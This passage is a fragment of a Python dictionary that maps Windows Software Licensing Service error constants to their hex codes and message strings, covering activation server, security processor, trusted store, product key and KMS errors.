'SL_E_CHPA_BUSINESS_RULE_INPUT_NOT_FOUND' : (0xC004C700, 'The activation server reported that business rule cound not find required input.'),
'SL_E_CHPA_NULL_VALUE_FOR_PROPERTY_NAME_OR_ID' : (0xC004C750, 'The activation server reported that NULL value specified for business property name and Id.'),
'SL_E_CHPA_UNKNOWN_PROPERTY_NAME' : (0xC004C751, 'The activation server reported that property name specifies unknown property.'),
'SL_E_CHPA_UNKNOWN_PROPERTY_ID' : (0xC004C752, 'The activation server reported that property Id specifies unknown property.'),
'SL_E_CHPA_FAILED_TO_UPDATE_PRODUCTKEY_BINDING' : (0xC004C755, 'The activation server reported that it failed to update product key binding.'),
'SL_E_CHPA_FAILED_TO_INSERT_PRODUCTKEY_BINDING' : (0xC004C756, 'The activation server reported that it failed to insert product key binding.'),
'SL_E_CHPA_FAILED_TO_DELETE_PRODUCTKEY_BINDING' : (0xC004C757, 'The activation server reported that it failed to delete product key binding.'),
'SL_E_CHPA_FAILED_TO_PROCESS_PRODUCT_KEY_BINDINGS_XML' : (0xC004C758, 'The activation server reported that it failed to process input XML for product key bindings.'),
'SL_E_CHPA_FAILED_TO_INSERT_PRODUCT_KEY_PROPERTY' : (0xC004C75A, 'The activation server reported that it failed to insert product key property.'),
'SL_E_CHPA_FAILED_TO_UPDATE_PRODUCT_KEY_PROPERTY' : (0xC004C75B, 'The activation server reported that it failed to update product key property.'),
'SL_E_CHPA_FAILED_TO_DELETE_PRODUCT_KEY_PROPERTY' : (0xC004C75C, 'The activation server reported that it failed to delete product key property.'),
'SL_E_CHPA_UNKNOWN_PRODUCT_KEY_TYPE' : (0xC004C764, 'The activation server reported that the product key type is unknown.'),
'SL_E_CHPA_PRODUCT_KEY_BEING_USED' : (0xC004C770, 'The activation server reported that the product key type is being used by another user.'),
'SL_E_CHPA_FAILED_TO_INSERT_PRODUCT_KEY_RECORD' : (0xC004C780, 'The activation server reported that it failed to insert product key record.'),
'SL_E_CHPA_FAILED_TO_UPDATE_PRODUCT_KEY_RECORD' : (0xC004C781, 'The activation server reported that it failed to update product key record.'),
'SL_REMAPPING_SP_PUB_API_INVALID_LICENSE' : (0xC004D000, ''),
'SL_REMAPPING_SP_PUB_API_INVALID_ALGORITHM_TYPE' : (0xC004D009, ''),
'SL_REMAPPING_SP_PUB_API_TOO_MANY_LOADED_ENVIRONMENTS' : (0xC004D00C, ''),
'SL_REMAPPING_SP_PUB_API_BAD_GET_INFO_QUERY' : (0xC004D012, ''),
'SL_REMAPPING_SP_PUB_API_INVALID_KEY_LENGTH' : (0xC004D055, ''),
'SL_REMAPPING_SP_PUB_API_NO_AES_PROVIDER' : (0xC004D073, ''),
'SL_REMAPPING_SP_PUB_API_HANDLE_NOT_COMMITED' : (0xC004D081, 'The handle was used before calling SPCommit with it.'),
'SL_REMAPPING_SP_PUB_GENERAL_NOT_INITIALIZED' : (0xC004D101, 'The security processor reported an initialization error.'),
'SL_REMAPPING_SP_STATUS_SYSTEM_TIME_SKEWED' : (0x8004D102, 'The security processor reported that the machine time is inconsistent with the trusted time.'),
'SL_REMAPPING_SP_STATUS_GENERIC_FAILURE' : (0xC004D103, 'The security processor reported that an error has occurred.'),
'SL_REMAPPING_SP_STATUS_INVALIDARG' : (0xC004D104, 'The security processor reported that invalid data was used.'),
'SL_REMAPPING_SP_STATUS_ALREADY_EXISTS' : (0xC004D105, 'The security processor reported that the value already exists.'),
'SL_REMAPPING_SP_STATUS_INSUFFICIENT_BUFFER' : (0xC004D107, 'The security processor reported that an insufficient buffer was used.'),
'SL_REMAPPING_SP_STATUS_INVALIDDATA' : (0xC004D108, 'The security processor reported that invalid data was used.'),
'SL_REMAPPING_SP_STATUS_INVALID_SPAPI_CALL' : (0xC004D109, 'The security processor reported that an invalid call was made.'),
'SL_REMAPPING_SP_STATUS_INVALID_SPAPI_VERSION' : (0xC004D10A, 'The security processor reported a version mismatch error.'),
'SL_REMAPPING_SP_STATUS_DEBUGGER_DETECTED' : (0x8004D10B, 'The security processor cannot operate while a debugger is attached.'),
'SL_REMAPPING_SP_STATUS_NO_MORE_DATA' : (0xC004D10C, 'No more data is available.'),
'SL_REMAPPING_SP_PUB_CRYPTO_INVALID_KEYLENGTH' : (0xC004D201, 'The length of the cryptopgraphic key material/blob is invalid.'),
'SL_REMAPPING_SP_PUB_CRYPTO_INVALID_BLOCKLENGTH' : (0xC004D202, 'The block length is not correct for this algorithm.'),
'SL_REMAPPING_SP_PUB_CRYPTO_INVALID_CIPHER' : (0xC004D203, 'The Cryptopgrahic cipher/algorithm type is invalid.'),
'SL_REMAPPING_SP_PUB_CRYPTO_INVALID_CIPHERMODE' : (0xC004D204, 'The specified cipher mode is invalid. For example both encrypt and decrypt cannot be specified for symmetric keys.'),
'SL_REMAPPING_SP_PUB_CRYPTO_UNKNOWN_PROVIDERID' : (0xC004D205, 'The SPAPIID for the specified Cryptographic Provider is unknown.'),
'SL_REMAPPING_SP_PUB_CRYPTO_UNKNOWN_KEYID' : (0xC004D206, 'The SPAPIID for the specified Cryptographic Key (type) is unknown.'),
'SL_REMAPPING_SP_PUB_CRYPTO_UNKNOWN_HASHID' : (0xC004D207, 'The SPAPIID for the specified Cryptographic Hash is unknown.'),
'SL_REMAPPING_SP_PUB_CRYPTO_UNKNOWN_ATTRIBUTEID' : (0xC004D208, 'The SPAPIID for the specified Cryptographic Attribute is unknown.'),
'SL_REMAPPING_SP_PUB_CRYPTO_HASH_FINALIZED' : (0xC004D209, 'The hash object has been finalized and can no longer be updated.'),
'SL_REMAPPING_SP_PUB_CRYPTO_KEY_NOT_AVAILABLE' : (0xC004D20A, 'The key is not available within the current state.'),
'SL_REMAPPING_SP_PUB_CRYPTO_KEY_NOT_FOUND' : (0xC004D20B, 'The key does not exist. It may not have have been created yet.'),
'SL_REMAPPING_SP_PUB_CRYPTO_NOT_BLOCK_ALIGNED' : (0xC004D20C, "The data length is not a multiple of the algorithm's block length."),
'SL_REMAPPING_SP_PUB_CRYPTO_INVALID_SIGNATURELENGTH' : (0xC004D20D, 'The length of the signature is not valid.'),
'SL_REMAPPING_SP_PUB_CRYPTO_INVALID_SIGNATURE' : (0xC004D20E, 'The signature does not correlate with the comparison hash.'),
'SL_REMAPPING_SP_PUB_CRYPTO_INVALID_BLOCK' : (0xC004D20F, 'The RSA block is not valid.'),
'SL_REMAPPING_SP_PUB_CRYPTO_INVALID_FORMAT' : (0xC004D210, 'The format of the RSA block is not valid.'),
'SL_REMAPPING_SP_PUB_CRYPTO_INVALID_PADDING' : (0xC004D211, 'The CBC padding is not valid.'),
'SL_REMAPPING_SP_PUB_TS_TAMPERED' : (0xC004D301, 'The security processor reported that the trusted data store was tampered.'),
'SL_REMAPPING_SP_PUB_TS_REARMED' : (0xC004D302, 'The security processor reported that the trusted data store was rearmed.'),
'SL_REMAPPING_SP_PUB_TS_RECREATED' : (0xC004D303, 'The security processor reported that the trusted store has been recreated.'),
'SL_REMAPPING_SP_PUB_TS_ENTRY_KEY_NOT_FOUND' : (0xC004D304, 'The security processor reported that entry key was not found in the trusted data store.'),
'SL_REMAPPING_SP_PUB_TS_ENTRY_KEY_ALREADY_EXISTS' : (0xC004D305, 'The security processor reported that the entry key already exists in the trusted data store.'),
'SL_REMAPPING_SP_PUB_TS_ENTRY_KEY_SIZE_TOO_BIG' : (0xC004D306, 'The security processor reported that the entry key is too big to fit in the trusted data store.'),
'SL_REMAPPING_SP_PUB_TS_MAX_REARM_REACHED' : (0xC004D307, 'The security processor reported that the maximum allowed number of re-arms has been exceeded. You must re-install the OS before trying to re-arm again.'),
'SL_REMAPPING_SP_PUB_TS_DATA_SIZE_TOO_BIG' : (0xC004D308, 'The security processor has reported that entry data size is too big to fit in the trusted data store.'),
'SL_REMAPPING_SP_PUB_TS_INVALID_HW_BINDING' : (0xC004D309, 'The security processor has reported that the machine has gone out of hardware tolerance.'),
'SL_REMAPPING_SP_PUB_TIMER_ALREADY_EXISTS' : (0xC004D30A, 'The security processor has reported that the secure timer already exists.'),
'SL_REMAPPING_SP_PUB_TIMER_NOT_FOUND' : (0xC004D30B, 'The security processor has reported that the secure timer was not found.'),
'SL_REMAPPING_SP_PUB_TIMER_EXPIRED' : (0xC004D30C, 'The security processor has reported that the secure timer has expired.'),
'SL_REMAPPING_SP_PUB_TIMER_NAME_SIZE_TOO_BIG' : (0xC004D30D, 'The security processor has reported that the secure timer name is too long.'),
'SL_REMAPPING_SP_PUB_TS_FULL' : (0xC004D30E, 'The security processor reported that the trusted data store is full.'),
'SL_REMAPPING_SP_PUB_TRUSTED_TIME_OK' : (0x4004D30F, 'Trusted time is already up-to-date.'),
'SL_REMAPPING_SP_PUB_TS_ENTRY_READ_ONLY' : (0xC004D310, 'Read-only entry cannot be modified.'),
'SL_REMAPPING_SP_PUB_TIMER_READ_ONLY' : (0xC004D311, 'Read-only timer cannot be modified.'),
'SL_REMAPPING_SP_PUB_TS_ATTRIBUTE_READ_ONLY' : (0xC004D312, 'Read-only attribute cannot be modified.'),
'SL_REMAPPING_SP_PUB_TS_ATTRIBUTE_NOT_FOUND' : (0xC004D313, 'Attribute not found.'),
'SL_REMAPPING_SP_PUB_TS_ACCESS_DENIED' : (0xC004D314, 'Trusted Store access denied.'),
'SL_REMAPPING_SP_PUB_TS_NAMESPACE_NOT_FOUND' : (0xC004D315, 'Namespace not found.'),
'SL_REMAPPING_SP_PUB_TS_NAMESPACE_IN_USE' : (0xC004D316, 'Namespace in use.'),
'SL_REMAPPING_SP_PUB_TS_TAMPERED_BREADCRUMB_LOAD_INVALID' : (0xC004D317, 'Trusted store tampered.'),
'SL_REMAPPING_SP_PUB_TS_TAMPERED_BREADCRUMB_GENERATION' : (0xC004D318, 'Trusted store tampered.'),
'SL_REMAPPING_SP_PUB_TS_TAMPERED_INVALID_DATA' : (0xC004D319, 'Trusted store tampered.'),
'SL_REMAPPING_SP_PUB_TS_TAMPERED_NO_DATA' : (0xC004D31A, 'Trusted store tampered.'),
'SL_REMAPPING_SP_PUB_TS_TAMPERED_DATA_BREADCRUMB_MISMATCH' : (0xC004D31B, 'Trusted store tampered'),
'SL_REMAPPING_SP_PUB_TS_TAMPERED_DATA_VERSION_MISMATCH' : (0xC004D31C, 'Trusted store tampered.'),
'SL_REMAPPING_SP_PUB_TAMPER_MODULE_AUTHENTICATION' : (0xC004D401, 'The security processor reported a system file mismatch error.'),
'SL_REMAPPING_SP_PUB_TAMPER_SECURITY_PROCESSOR_PATCHED' : (0xC004D402, 'The security processor reported a system file mismatch error.'),
'SL_REMAPPING_SP_PUB_KM_CACHE_TAMPER' : (0xC004D501, 'The security processor reported an error with the kernel data.'),
'SL_REMAPPING_SP_PUB_KM_CACHE_TAMPER_RESTORE_FAILED' : (0xC004D502, 'Kernel Mode Cache is tampered and the restore attempt failed.'),
'SL_REMAPPING_SP_PUB_KM_CACHE_IDENTICAL' : (0x4004D601, 'Kernel Mode Cache was not changed.'),
'SL_REMAPPING_SP_PUB_KM_CACHE_POLICY_CHANGED' : (0x4004D602, 'Reboot-requiring policies have changed.'),
'SL_REMAPPING_SP_STATUS_PUSHKEY_CONFLICT' : (0xC004D701, 'External decryption key was already set for specified feature.'),
'SL_REMAPPING_SP_PUB_PROXY_SOFT_TAMPER' : (0xC004D702, 'Error occured during proxy execution'),
'SL_E_INVALID_CONTEXT' : (0xC004E001, 'The Software Licensing Service determined that the specified context is invalid.'),
'SL_E_TOKEN_STORE_INVALID_STATE' : (0xC004E002, 'The Software Licensing Service reported that the license store contains inconsistent data.'),
'SL_E_EVALUATION_FAILED' : (0xC004E003, 'The Software Licensing Service reported that license evaluation failed.'),
'SL_E_NOT_EVALUATED' : (0xC004E004, 'The Software Licensing Service reported that the license has not been evaluated.'),
'SL_E_NOT_ACTIVATED' : (0xC004E005, 'The Software Licensing Service reported that the license is not activated.'),
'SL_E_INVALID_GUID' : (0xC004E006, 'The Software Licensing Service reported that the license contains invalid data.'),
'SL_E_TOKSTO_TOKEN_NOT_FOUND' : (0xC004E007, 'The Software Licensing Service reported that the license store does not contain the requested license.'),
'SL_E_TOKSTO_NO_PROPERTIES' : (0xC004E008, 'The Software Licensing Service reported that the license property is invalid.'),
'SL_E_TOKSTO_NOT_INITIALIZED' : (0xC004E009, 'The Software Licensing Service reported that the license store is not initialized.'),
'SL_E_TOKSTO_ALREADY_INITIALIZED' : (0xC004E00A, 'The Software Licensing Service reported that the license store is already initialized.'),
'SL_E_TOKSTO_NO_ID_SET' : (0xC004E00B, 'The Software Licensing Service reported that the license property is invalid.'),
'SL_E_TOKSTO_CANT_CREATE_FILE' : (0xC004E00C, 'The Software Licensing Service reported that the license could not be opened or created.'),
'SL_E_TOKSTO_CANT_WRITE_TO_FILE' : (0xC004E00D, 'The Software Licensing Service reported that the license could not be written.'),
'SL_E_TOKSTO_CANT_READ_FILE' : (0xC004E00E, 'The Software Licensing Service reported that the license store could not read the license file.'),
'SL_E_TOKSTO_CANT_PARSE_PROPERTIES' : (0xC004E00F, 'The Software Licensing Service reported that the license property is corrupted.'),
'SL_E_TOKSTO_PROPERTY_NOT_FOUND' : (0xC004E010, 'The Software Licensing Service reported that the license property is missing.'),
'SL_E_TOKSTO_INVALID_FILE' : (0xC004E011, 'The Software Licensing Service reported that the license store contains an invalid license file.'),
'SL_E_TOKSTO_CANT_CREATE_MUTEX' : (0xC004E012, 'The Software Licensing Service reported that the license store failed to start synchronization properly.'),
'SL_E_TOKSTO_CANT_ACQUIRE_MUTEX' : (0xC004E013, 'The Software Licensing Service reported that the license store failed to synchronize properly.'),
'SL_E_TOKSTO_NO_TOKEN_DATA' : (0xC004E014, 'The Software Licensing Service reported that the license property is invalid.'),
'SL_E_EUL_CONSUMPTION_FAILED' : (0xC004E015, 'The Software Licensing Service reported that license consumption failed.'),
'SL_E_PKEY_INVALID_CONFIG' : (0xC004E016, 'The Software Licensing Service reported that the product key is invalid.'),
'SL_E_PKEY_INVALID_UNIQUEID' : (0xC004E017, 'The Software Licensing Service reported that the product key is invalid.'),
'SL_E_PKEY_INVALID_ALGORITHM' : (0xC004E018, 'The Software Licensing Service reported that the product key is invalid.'),
'SL_E_PKEY_INTERNAL_ERROR' : (0xC004E019, 'The Software Licensing Service determined that validation of the specified product key failed.'),
'SL_E_LICENSE_INVALID_ADDON_INFO' : (0xC004E01A, 'The Software Licensing Service reported that invalid add-on information was found.'),
'SL_E_HWID_ERROR' : (0xC004E01B, 'The Software Licensing Service reported that not all hardware information could be collected.'),
'SL_E_PKEY_INVALID_KEYCHANGE1' : (0xC004E01C, 'This evaluation product key is no longer valid.'),
'SL_E_PKEY_INVALID_KEYCHANGE2' : (0xC004E01D, 'The new product key cannot be used on this installation of Windows. Type a different product key. (CD-AB)'),
'SL_E_PKEY_INVALID_KEYCHANGE3' : (0xC004E01E, 'The new product key cannot be used on this installation of Windows. Type a different product key. (AB-AB)'),
'SL_E_POLICY_OTHERINFO_MISMATCH' : (0xC004E020, 'The Software Licensing Service reported that there is a mismatched between a policy value and information stored in the OtherInfo section.'),
'SL_E_PRODUCT_UNIQUENESS_GROUP_ID_INVALID' : (0xC004E021, 'The Software Licensing Service reported that the Genuine information contained in the license is not consistent.'),
'SL_E_SECURE_STORE_ID_MISMATCH' : (0xC004E022, 'The Software Licensing Service reported that the secure store id value in license does not match with the current value.'),
'SL_E_INVALID_RULESET_RULE' : (0xC004E023, 'The Software Licensing Service reported that the notification rules appear to be invalid.'),
'SL_E_INVALID_CONTEXT_DATA' : (0xC004E024, 'The Software Licensing Service reported that the reported machine data appears to be invalid.'),
'SL_E_INVALID_HASH' : (0xC004E025, 'The Software Licensing Service reported that the data hash does not correspond to the data.'),
'SL_E_INVALID_USE_OF_ADD_ON_PKEY' : (0x8004E026, 'The Software Licensing Service reported that a valid product key for an add-on sku was entered where a Windows product key was expected.'),
'SL_E_WINDOWS_VERSION_MISMATCH' : (0xC004E027, 'The Software Licensing Service reported that the version of SPPSvc does not match the policy.'),
'SL_E_ACTIVATION_IN_PROGRESS' : (0xC004E028, 'The Software Licensing Service reported that there is another activation attempt in progress for this sku. Please wait for that attempt to complete before trying again.'),
'SL_E_STORE_UPGRADE_TOKEN_REQUIRED' : (0xC004E029, 'The Software Licensing Service reported that the activated license requires a corresponding Store upgrade license in order to work. Please visit the Store to purchase a new license or re-download an existing one.'),
'SL_E_STORE_UPGRADE_TOKEN_WRONG_EDITION' : (0xC004E02A, 'The Software Licensing Service reported that the Store upgrade license is not enabled for the current OS edition. Please visit the Store to purchase the appropriate license.'),
'SL_E_STORE_UPGRADE_TOKEN_WRONG_PID' : (0xC004E02B, 'The Software Licensing Service reported that the Store upgrade license does not match the current active product key. Please visit the Store to purchase a new license or re-download an existing one.'),
'SL_E_STORE_UPGRADE_TOKEN_NOT_PRS_SIGNED' : (0xC004E02C, 'The Software Licensing Service reported that the Store upgrade license does not match the current signing level for the installed Operating System. Please visit the Store to purchase a new license or re-download an existing one.'),
'SL_E_STORE_UPGRADE_TOKEN_WRONG_VERSION' : (0xC004E02D, 'The Software Licensing Service reported that the Store upgrade license does not enable the current version of the installed Operating System. Please visit the Store to purchase a new license or re-download an existing one.'),
'SL_E_STORE_UPGRADE_TOKEN_NOT_AUTHORIZED' : (0xC004E02E, 'The Software Licensing Service reported that the Store upgrade license could not be authorized. Please visit the Store to purchase a new license or re-download an existing one.'),
'SL_E_SFS_INVALID_FS_VERSION' : (0x8004E101, 'The Software Licensing Service reported that the Token Store file version is invalid.'),
'SL_E_SFS_INVALID_FD_TABLE' : (0x8004E102, 'The Software Licensing Service reported that the Token Store contains an invalid descriptor table.'),
'SL_E_SFS_INVALID_SYNC' : (0x8004E103, 'The Software Licensing Service reported that the Token Store contains a token with an invalid header/footer.'),
'SL_E_SFS_BAD_TOKEN_NAME' : (0x8004E104, 'The Software Licensing Service reported that a Token Store token has an invalid name.'),
'SL_E_SFS_BAD_TOKEN_EXT' : (0x8004E105, 'The Software Licensing Service reported that a Token Store token has an invalid extension.'),
'SL_E_SFS_DUPLICATE_TOKEN_NAME' : (0x8004E106, 'The Software Licensing Service reported that the Token Store contains a duplicate token.'),
'SL_E_SFS_TOKEN_SIZE_MISMATCH' : (0x8004E107, 'The Software Licensing Service reported that a token in the Token Store has a size mismatch.'),
'SL_E_SFS_INVALID_TOKEN_DATA_HASH' : (0x8004E108, 'The Software Licensing Service reported that a token in the Token Store contains an invalid hash.'),
'SL_E_SFS_FILE_READ_ERROR' : (0x8004E109, 'The Software Licensing Service reported that the Token Store was unable to read a token.'),
'SL_E_SFS_FILE_WRITE_ERROR' : (0x8004E10A, 'The Software Licensing Service reported that the Token Store was unable to write a token.'),
'SL_E_SFS_INVALID_FILE_POSITION' : (0x8004E10B, 'The Software Licensing Service reported that the Token Store attempted an invalid file operation.'),
'SL_E_SFS_NO_ACTIVE_TRANSACTION' : (0x8004E10C, 'The Software Licensing Service reported that there is no active transaction.'),
'SL_E_SFS_INVALID_FS_HEADER' : (0x8004E10D, 'The Software Licensing Service reported that the Token Store file header is invalid.'),
'SL_E_SFS_INVALID_TOKEN_DESCRIPTOR' : (0x8004E10E, 'The Software Licensing Service reported that a Token Store token descriptor is invalid.'),
'SL_E_INTERNAL_ERROR' : (0xC004F001, 'The Software Licensing Service reported an internal error.'),
'SL_E_RIGHT_NOT_CONSUMED' : (0xC004F002, 'The Software Licensing Service reported that rights consumption failed.'),
'SL_E_USE_LICENSE_NOT_INSTALLED' : (0xC004F003, 'The Software Licensing Service reported that the required license could not be found.'),
'SL_E_MISMATCHED_PKEY_RANGE' : (0xC004F004, 'The Software Licensing Service reported that the product key does not match the range defined in the license.'),
'SL_E_MISMATCHED_PID' : (0xC004F005, 'The Software Licensing Service reported that the product key does not match the product key for the license.'),
'SL_E_EXTERNAL_SIGNATURE_NOT_FOUND' : (0xC004F006, 'The Software Licensing Service reported that the signature file for the license is not available.'),
'SL_E_RAC_NOT_AVAILABLE' : (0xC004F007, 'The Software Licensing Service reported that the license could not be found.'),
'SL_E_SPC_NOT_AVAILABLE' : (0xC004F008, 'The Software Licensing Service reported that the license could not be found.'),
'SL_E_GRACE_TIME_EXPIRED' : (0xC004F009, 'The Software Licensing Service reported that the grace period expired.'),
'SL_E_MISMATCHED_APPID' : (0xC004F00A, 'The Software Licensing Service reported that the application ID does not match the application ID for the license.'),
'SL_E_NO_PID_CONFIG_DATA' : (0xC004F00B, 'The Software Licensing Service reported that the product identification data is not available.'),
'SL_I_OOB_GRACE_PERIOD' : (0x4004F00C, 'The Software Licensing Service reported that the application is running within the valid grace period.'),
'SL_I_OOT_GRACE_PERIOD' : (0x4004F00D, 'The Software Licensing Service reported that the application is running within the valid out of tolerance grace period.'),
'SL_E_MISMATCHED_SECURITY_PROCESSOR' : (0xC004F00E, 'The Software Licensing Service determined that the license could not be used by the current version of the security processor component.'),
'SL_E_OUT_OF_TOLERANCE' : (0xC004F00F, 'The Software Licensing Service reported that the hardware ID binding is beyond the level of tolerance.'),
'SL_E_INVALID_PKEY' : (0xC004F010, 'The Software Licensing Service reported that the product key is invalid.'),
'SL_E_LICENSE_FILE_NOT_INSTALLED' : (0xC004F011, 'The Software Licensing Service reported that the license file is not installed.'),
'SL_E_VALUE_NOT_FOUND' : (0xC004F012, 'The Software Licensing Service reported that the call has failed because the value for the input key was not found.'),
'SL_E_RIGHT_NOT_GRANTED' : (0xC004F013, 'The Software Licensing Service determined that there is no permission to run the software.'),
'SL_E_PKEY_NOT_INSTALLED' : (0xC004F014, 'The Software Licensing Service reported that the product key is not available.'),
'SL_E_PRODUCT_SKU_NOT_INSTALLED' : (0xC004F015, 'The Software Licensing Service reported that the license is not installed.'),
'SL_E_NOT_SUPPORTED' : (0xC004F016, 'The Software Licensing Service determined that the request is not supported.'),
'SL_E_PUBLISHING_LICENSE_NOT_INSTALLED' : (0xC004F017, 'The Software Licensing Service reported that the license is not installed.'),
'SL_E_LICENSE_SERVER_URL_NOT_FOUND' : (0xC004F018, 'The Software Licensing Service reported that the license does not contain valid location data for the activation server.'),
'SL_E_INVALID_EVENT_ID' : (0xC004F019, 'The Software Licensing Service determined that the requested event ID is invalid.'),
'SL_E_EVENT_NOT_REGISTERED' : (0xC004F01A, 'The Software Licensing Service determined that the requested event is not registered with the service.'),
'SL_E_EVENT_ALREADY_REGISTERED' : (0xC004F01B, 'The Software Licensing Service reported that the event ID is already registered.'),
'SL_E_DECRYPTION_LICENSES_NOT_AVAILABLE' : (0xC004F01C, 'The Software Licensing Service reported that the license is not installed.'),
'SL_E_LICENSE_SIGNATURE_VERIFICATION_FAILED' : (0xC004F01D, 'The Software Licensing Service reported that the verification of the license failed.'),
'SL_E_DATATYPE_MISMATCHED' : (0xC004F01E, 'The Software Licensing Service determined that the input data type does not match the data type in the license.'),
'SL_E_INVALID_LICENSE' : (0xC004F01F, 'The Software Licensing Service determined that the license is invalid.'),
'SL_E_INVALID_PACKAGE' : (0xC004F020, 'The Software Licensing Service determined that the license package is invalid.'),
'SL_E_VALIDITY_TIME_EXPIRED' : (0xC004F021, 'The Software Licensing Service reported that the validity period of the license has expired.'),
'SL_E_LICENSE_AUTHORIZATION_FAILED' : (0xC004F022, 'The Software Licensing Service reported that the license authorization failed.'),
'SL_E_LICENSE_DECRYPTION_FAILED' : (0xC004F023, 'The Software Licensing Service reported that the license is invalid.'),
'SL_E_WINDOWS_INVALID_LICENSE_STATE' : (0xC004F024, 'The Software Licensing Service reported that the license is invalid.'),
'SL_E_LUA_ACCESSDENIED' : (0xC004F025, 'The Software Licensing Service reported that the action requires administrator privilege.'),
'SL_E_PROXY_KEY_NOT_FOUND' : (0xC004F026, 'The Software Licensing Service reported that the required data is not found.'),
'SL_E_TAMPER_DETECTED' : (0xC004F027, 'The Software Licensing Service reported that the license is tampered.'),
'SL_E_POLICY_CACHE_INVALID' : (0xC004F028, 'The Software Licensing Service reported that the policy cache is invalid.'),
'SL_E_INVALID_RUNNING_MODE' : (0xC004F029, 'The Software Licensing Service cannot be started in the current OS mode.'),
'SL_E_SLP_NOT_SIGNED' : (0xC004F02A, 'The Software Licensing Service reported that the license is invalid.'),
'SL_E_CIDIID_INVALID_DATA' : (0xC004F02C, 'The Software Licensing Service reported that the format for the offline activation data is incorrect.'),
'SL_E_CIDIID_INVALID_VERSION' : (0xC004F02D, 'The Software Licensing Service determined that the version of the offline Confirmation ID (CID) is incorrect.'),
'SL_E_CIDIID_VERSION_NOT_SUPPORTED' : (0xC004F02E, 'The Software Licensing Service determined that the version of the offline Confirmation ID (CID) is not supported.'),
'SL_E_CIDIID_INVALID_DATA_LENGTH' : (0xC004F02F, 'The Software Licensing Service reported that the length of the offline Confirmation ID (CID) is incorrect.'),
'SL_E_CIDIID_NOT_DEPOSITED' : (0xC004F030, 'The Software Licensing Service determined that the Installation ID (IID) or the Confirmation ID (CID) could not been saved.'),
'SL_E_CIDIID_MISMATCHED' : (0xC004F031, 'The Installation ID (IID) and the Confirmation ID (CID) do not match. Please confirm the IID and reacquire a new CID if necessary.'),
'SL_E_INVALID_BINDING_BLOB' : (0xC004F032, 'The Software Licensing Service determined that the binding data is invalid.'),
'SL_E_PRODUCT_KEY_INSTALLATION_NOT_ALLOWED' : (0xC004F033, 'The Software Licensing Service reported that the product key is not allowed to be installed. Please see the eventlog for details.'),
'SL_E_EUL_NOT_AVAILABLE' : (0xC004F034, 'The Software Licensing Service reported that the license could not be found or was invalid.'),
'SL_E_VL_NOT_WINDOWS_SLP' : (0xC004F035, 'The Software Licensing Service reported that the computer could not be activated with a Volume license product key. Volume-licensed systems require upgrading from a qualifying operating system. Please contact your system administrator or use a different type of key.'),
'SL_E_VL_NOT_ENOUGH_COUNT' : (0xC004F038, 'The Software Licensing Service reported that the product could not be activated. The count reported by your Key Management Service (KMS) is insufficient. Please contact your system administrator.'),
'SL_E_VL_BINDING_SERVICE_NOT_ENABLED' : (0xC004F039, 'The Software Licensing Service reported that the product could not be activated. The Key Management Service (KMS) is not enabled.'),
'SL_E_VL_INFO_PRODUCT_USER_RIGHT' : (0x4004F040, 'The Software Licensing Service reported that the product was activated but the owner should verify the Product Use Rights.'),
'SL_E_VL_KEY_MANAGEMENT_SERVICE_NOT_ACTIVATED' : (0xC004F041, 'The Software Licensing Service determined that the Key Management Service (KMS) is not activated. KMS needs to be activated. Please contact system administrator.'),
'SL_E_VL_KEY_MANAGEMENT_SERVICE_ID_MISMATCH' : (0xC004F042, 'The Software Licensing Service determined that the specified Key Management Service (KMS) cannot be used.'),
'SL_E_PROXY_POLICY_NOT_UPDATED' : (0xC004F047, 'The Software Licensing Service reported that the proxy policy has not been updated.'),
'SL_E_CIDIID_INVALID_CHECK_DIGITS' : (0xC004F04D, 'The Software Licensing Service determined that the Installation ID (IID) or the Confirmation ID (CID) is invalid.'),
'SL_E_LICENSE_MANAGEMENT_DATA_NOT_FOUND' : (0xC004F04F, 'The Software Licensing Service reported that license management information was not found in the licenses.'),
'SL_E_INVALID_PRODUCT_KEY' : (0xC004F050, 'The Software Licensing Service reported that the product key is invalid.'),
'SL_E_BLOCKED_PRODUCT_KEY' : (0xC004F051, 'The Software Licensing Service reported that the product key is blocked.'),
'SL_E_DUPLICATE_POLICY' : (0xC004F052, 'The Software Licensing Service reported that the licenses contain duplicated properties.'),
'SL_E_MISSING_OVERRIDE_ONLY_ATTRIBUTE' : (0xC004F053, 'The Software Licensing Service determined that the license is invalid. The license contains an override policy that is not configured properly.'),
'SL_E_LICENSE_MANAGEMENT_DATA_DUPLICATED' : (0xC004F054, 'The Software Licensing Service reported that license management information has duplicated data.'),
'SL_E_BASE_SKU_NOT_AVAILABLE' : (0xC004F055, 'The Software Licensing Service reported that the base SKU is not available.'),
'SL_E_VL_MACHINE_NOT_BOUND' : (0xC004F056, 'The Software Licensing Service reported that the product could not be activated using the Key Management Service (KMS).'),
'SL_E_SLP_MISSING_ACPI_SLIC' : (0xC004F057, 'The Software Licensing Service reported that the computer BIOS is missing a required license.'),
'SL_E_SLP_MISSING_SLP_MARKER' : (0xC004F058, 'The Software Licensing Service reported that the computer BIOS is missing a required license.'),
'SL_E_SLP_BAD_FORMAT' : (0xC004F059, 'The Software Licensing Service reported that a license in the computer BIOS is invalid.'),
'SL_E_INVALID_PACKAGE_VERSION' : (0xC004F060, 'The Software Licensing Service determined that the version of the license package is invalid.'),
'SL_E_PKEY_INVALID_UPGRADE' : (0xC004F061, 'The Software Licensing Service determined that this specified product key can only be used for upgrading, not for clean installations.'),
'SL_E_ISSUANCE_LICENSE_NOT_INSTALLED' : (0xC004F062, 'The Software Licensing Service reported that a required license could not be found.'),
'SL_E_SLP_OEM_CERT_MISSING' : (0xC004F063, 'The Software Licensing Service reported that the computer is missing a required OEM license.'),
'SL_E_NONGENUINE_GRACE_TIME_EXPIRED' : (0xC004F064, 'The Software Licensing Service reported that the non-genuine grace period expired.'),
'SL_I_NONGENUINE_GRACE_PERIOD' : (0x4004F065, 'The Software Licensing Service reported that the application is running within the valid non-genuine grace period.'),
'SL_E_DEPENDENT_PROPERTY_NOT_SET' : (0xC004F066, 'The Software Licensing Service reported that the genuine information property can not be set before dependent property been set.'),
'SL_E_NONGENUINE_GRACE_TIME_EXPIRED_2' : (0xC004F067, 'The Software Licensing Service reported that the non-genuine grace period expired (type 2).'),
'SL_I_NONGENUINE_GRACE_PERIOD_2' : (0x4004F068, 'The Software Licensing Service reported that the application is running within the valid non-genuine grace period (type 2).'),
'SL_E_MISMATCHED_PRODUCT_SKU' : (0xC004F069, 'The Software Licensing Service reported that the product SKU is not found.'),
'SL_E_OPERATION_NOT_ALLOWED' : (0xC004F06A, 'The Software Licensing Service reported that the requested operation is not allowed.'),
